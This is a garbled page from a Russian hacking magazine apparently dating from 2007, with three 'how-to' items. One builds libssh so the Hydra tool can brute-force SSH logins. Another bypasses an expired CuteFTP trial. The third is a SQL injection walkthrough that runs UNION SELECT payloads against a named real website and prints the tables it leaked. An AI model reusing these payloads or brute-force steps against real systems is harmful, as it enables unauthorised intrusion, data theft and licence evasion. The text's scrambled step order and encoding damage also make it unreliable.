ÃÂþÑÂñрь - Xakep Online
ÃÂþÑÂñрь - Xakep Online
ÃÂþÑÂñрь - Xakep Online
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
взлом<br />
4. Переходим в извлеченный каталог:<br />
$ make install<br />
$ cd libssh-0.1<br />
6. Копируем исошник в /usr/lib:<br />
5. Приступаем к сборке:<br />
$ cp /usr/local/lib/libssh.so /usr/lib/<br />
$ ./configure<br />
$ make<br />
7. Инсталлируем и запускаем Гидру. Теперь брут по SSH будет работать :).<br />
№5<br />
Разблокировка окна CuteFTP 8 при помощи InqSoft<br />
WindowScanner<br />
Задача: поработать с FTP-клиентом CuteFTP 8, у которого<br />
истек демонстрационный срок.<br />
Решение:<br />
Как известно, при попытке запуска после истечения триала CuteFTP выдает<br />
окошко-наг, в котором присутствуют две кнопки: Enter Serial Number и<br />
Close. Попробуем обойти это досадное ограничение.<br />
1. Основная программа инициализировалась в памяти, ведь наг выведен<br />
на фоне окна FTP-клиента. Для того чтобы поработать с программой,<br />
придется каким-то образом получить доступ к заблокированному окну.<br />
Прибегнем к помощи InqSoft WindowScanner. Запускаем его. Используя<br />
инструмент «Прицел», выделяем основное окно программы CuteFTP.<br />
2. Нажимаем на кнопку «Управление» для вывода на экран панели<br />
управления активным окном. Она тут же появится в нижней части окна программы.<br />
Из всех кнопок этой панели нас интересует одна — кнопка «Окно<br />
активно» (по счету она седьмая слева). Жмем ее и... готово! Окно CuteFtp<br />
теперь доступно, с программой можно работать.<br />
3. Навязчивый наг на время работы можно убрать путем выделения его<br />
окошка инструментом «Прицел» и нажатия на кнопку «Окно видимо» на<br />
панели управления окнами.<br />
Альтернатива:<br />
Существует пакет Sign of Misery (s0m.narod.ru) от той же конторы, который<br />
обладает возможностью написания несложных скриптов. С его помощью<br />
можно выполнять еще более изощренные вещи, обладая лишь базовым<br />
набором знаний и не владея отладчиком и другими крякерскими тулзами!<br />
№6<br />
http://www.onlinecasinoreports.com/news_show_cat.<br />
asp?cat=1%27<br />
2. Подбираем количество полей:<br />
http://www.onlinecasinoreports.com/news_show_cat.<br />
asp?cat=1%27+union+select+1,2,3--<br />
Составляем кверю вида:<br />
Выдираем список таблиц из БД<br />
Задача: извлечь таблицы и поля из MSSQL при наличии<br />
SQL-инъекции.<br />
Решение:<br />
Давай разберемся в ситуации на конкретном примере. Как ты знаешь,<br />
в мускуле в большинстве случаев названия таблиц в базе приходится<br />
либо подбирать ручками, либо брутить специально предназначенным<br />
для этого софтом. Исключение составляет лишь MySQL пятой версии<br />
(и ниже), в котором так же, как и в MSSQL, есть очень полезная для нас<br />
с тобой база под названием information_schema. В ней содержится<br />
информация о названии всех таблиц и полей, хранящихся в СУБД. Причем<br />
обратиться с запросом к БД information_schema может любой юзер<br />
СУБД независимо от прав доступа. Так что будем действовать согласно<br />
следующему плану:<br />
1. Посмотрим, как все вышеизложенное работает на практике. Берем<br />
заведомо уязвимый ресурс:<br />
048<br />
http://www.onlinecasinoreports.com/news_<br />
show_cat.asp?cat=1%27+union+select+1,table_<br />
name,3+from+information_schema.tables--<br />
3. В качестве ответа получаем список всех доступных табличек:<br />
...<br />
ADMIN_LOGIN_ATTEMPTS<br />
archive<br />
bnr_banner_types<br />
bnr_banners<br />
BNR_VIEWD_BANNER_LOGS<br />
BNR_VIEWD_BANNER_LOGS_SUMMARY<br />
BRANDS<br />
CATEGORIES<br />
...<br />
4. Радуемся, поскольку в этом случае нам повезло. MSSQL вернул нам все<br />
и сразу :). Обычно в запросах приходится использовать конструкцию top,<br />
которая является убогим аналогом limit’а в мускуле.<br />
xàêåð 11 /107/ 07